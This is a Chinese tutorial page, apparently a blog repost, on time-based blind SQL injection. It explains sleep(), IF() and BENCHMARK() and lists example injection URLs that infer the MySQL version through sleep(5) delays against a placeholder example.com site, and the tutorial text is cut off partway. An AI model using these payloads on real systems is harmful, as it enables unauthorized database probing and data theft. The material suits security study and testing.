首页 > 其他分享 >【漏洞挖掘】——103、Blind注入类型深入刨析(中)

【漏洞挖掘】——103、Blind注入类型深入刨析(中)

时间:2024-06-21 15:01:11浏览次数:20  
标签:Blind www http 刨析 sleep --+ 103 com example

时间盲注
使用场景

没有True/False,也没有任何错误提示类信息,在这种情况下可以考虑通过时间线的长短来判断是否存在SQL注入,即基于时间的盲注!

函数简介
  • sleep():用于延迟
  • IF(Condition,A,B):当Condition为TRUE时,返回A;当Condition为FALSE时,返回B
  • BENCHMARK(count,expr):重复count次执行表达式expr,它可以用于计时MySQL处理表达式有多快,结果值总是0
盲注流程

首先我们需要猜解后台的SQL语句的画像究竟如何之后便于我们构造SQL语句,例如:究竟是字符型还是数字型,还是使用了括号、双引号

猜解数据库版本信息

版本号第一位:

http://www.example.com/?id=1 and if(left(version(),1)>4,1,sleep(5)) --+    #没有任何延时

http://www.example.com/?id=1 and if(left(version(),1)>5,1,sleep(5)) --+    #延时5s

http://www.example.com/?id=1 and if(left(version(),1)=5,1,sleep(5)) --+    #没有任何延时

版本号第二位:

http://www.example.com/?id=1 and if(left(version(),3)>5.4,1,sleep(5)) --+    #没有任何延时

http://www.example.com

标签:Blind,www,http,刨析,sleep,--+,103,com,example
From: https://blog.csdn.net/Fly_hps/article/details/139859857

相关文章

  • 基于STM32F103 HAL库 开发PWM读取
    目录CubeMX配置调试配置​时钟配置​编辑定时器配置打开定时器捕获中断代码readpwm.hreadpwm.cCubeMX配置调试配置时钟配置定时器配置测已知周期的占空比,我们要读取的PWM周期是20ms,于是我设计预分频系数是72-1,自动重装载系数是40000-1,周期是40ms,存在两个完整......
  • 洛谷 P1030 [NOIP2001 普及组] 求先序排列
    因为题目求先序,意味着要不断找根。那么我们来看这道题方法:(示例)中序ACGDBHZKX,后序CDGAHXKZB,首先可找到主根B;那么我们找到中序遍历中的B,由这种遍历的性质,可将中序遍历分为ACGD和HZKX两棵子树,那么对应可找到后序遍历CDGA和HXKZ(从头找即可)从而问题就变成求1.中序遍历ACGD,后序......
  • 智慧博物馆智能化系统解决方案PPT(103页),哪些技术对于提升参观体验最为关键?
        智慧博物馆智能化系统解决方案旨在通过集成互联网+物联网技术,提升博物馆的管理效率和参观体验。主要内容包括:项目概述:介绍智能化系统在博物馆中的应用,以及国家级博物馆××××的设计指导思想和系统基础。需求分析:强调智能环境控制、建筑设备监控、网络安全和电子......
  • 1-STM32F103+ESP8266+ML307(中移4G Cat1)--硬件使用说明
    <p><iframename="ifd"src="https://mnifdv.cn/resource/cnblogs/ZLIOTB/ML307/my.html"frameborder="0"scrolling="auto"width="100%"height="1500"></iframe></p> 实物图 板载说......
  • 基于STM32F103 HAL库 开发 串口通讯
    目录CubeMX配置调试配置​时钟配置打开串口2的中断配置串口2波特率等代码com.hcom.cCubeMX配置调试配置时钟配置打开串口2的中断配置串口2波特率等串口3同理就不展示了代码com.h#ifndef__COM_H__#define__COM_H__typedefstruct{ charTxBuffe......
  • 103. 二叉树的锯齿形层序遍历
    /***Definitionforabinarytreenode.*typeTreeNodestruct{*Valint*Left*TreeNode*Right*TreeNode*}*/funczigzagLevelOrder(root*TreeNode)[][]int{//层序遍历改下ifroot==nil{returnnil}que......
  • 力扣:1103. 分糖果 II
    1103.分糖果II排排坐,分糖果。我们买了一些糖果 candies,打算把它们分给排好队的 n=num_people 个小朋友。给第一个小朋友1颗糖果,第二个小朋友2颗,依此类推,直到给最后一个小朋友 n 颗糖果。然后,我们再回到队伍的起点,给第一个小朋友 n +1 颗糖果,第二个小朋友......
  • 基于STM32F103C8T6微控制器的物流信息检测系统
    摘要本论文设计并实现了一种基于STM32F103C8T6微控制器的物流信息检测系统。该系统旨在通过综合各种传感器模块实现对运输车环境及状态的实时监控,并通过4G网络将信息发送到手机端,以便用户进行远程管理和控制。首先,系统通过GPS模块获取运输车的位置信息,实现车辆定位和轨迹跟踪......
  • 某讯tz103s_v1.4改串、开adb、去控
    方案记录如下,使用后果自负!如果有人0.9都逃费,甚至拿出去倒卖的话,我只能说...格局小了!提前说明:这款棒子频段不全且为板载wifi天线,不推荐作为主力使用,但没有限速、微信直充、套餐真香~这里介绍的是不需要编程器的玩法改串:先登录,访问这个链接,进入工厂模式。打开AT端口,不出意料电......
  • GD32F103VET6通过仰邦BX_6K1字符卡控制96*16LED显示
    1.GD32F103VET6介绍        GD32系列单片机和STM32系列单片机在应用上十分类似,需要注意的是本系统GD32的最大时钟频率是108MHz。本系统的功能是实现LORA网关,GD32F103VET6相较于STM32系列单片机的性价比更高。          GD32F103VET6是一款基于Arm®的32位......